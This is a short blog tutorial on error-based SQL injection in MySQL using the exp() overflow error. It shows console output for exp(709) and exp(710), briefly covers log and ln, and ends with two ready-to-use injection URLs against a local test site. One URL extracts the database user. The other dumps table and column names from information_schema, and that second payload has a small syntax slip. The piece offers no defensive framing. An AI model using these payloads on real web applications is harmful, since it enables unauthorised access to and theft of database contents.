Error Based Sql Injection With Exponential Method

Error based sql injection with exponential method

Error Based Sql Injection With Exponential Method

Hello guys in previous post I covered basic normal error based sql injection but in this post I will cover error based sql injection with exponential method and mathematical operations.When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

POC 1:

mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the log functions of MySQL.If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to:error based sql injection exponential method

POC 2:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+

| 2.70805020110221 |

1 row in set (0.00 sec)

Exponentials are the opposite of logarithms. The exp function would do the exact opposite for us.

Injection :

  • Extracting database name
    http://127.0.0.1/?id=1' or exp(~(select*from(select user())x))-- -
  • Extracting Table name and column name in one shot.
http://127.0.0.1/?id=1' or exp(~(select * from(select group_concat('<li>',table_name,'::::'column_name) from information_schema.columns where table_schema=database())x))-- -

Yeah we done and injected using exponential method.

Thanks for reading guys keep learning 😉

 

1 COMMENT

Leave a Reply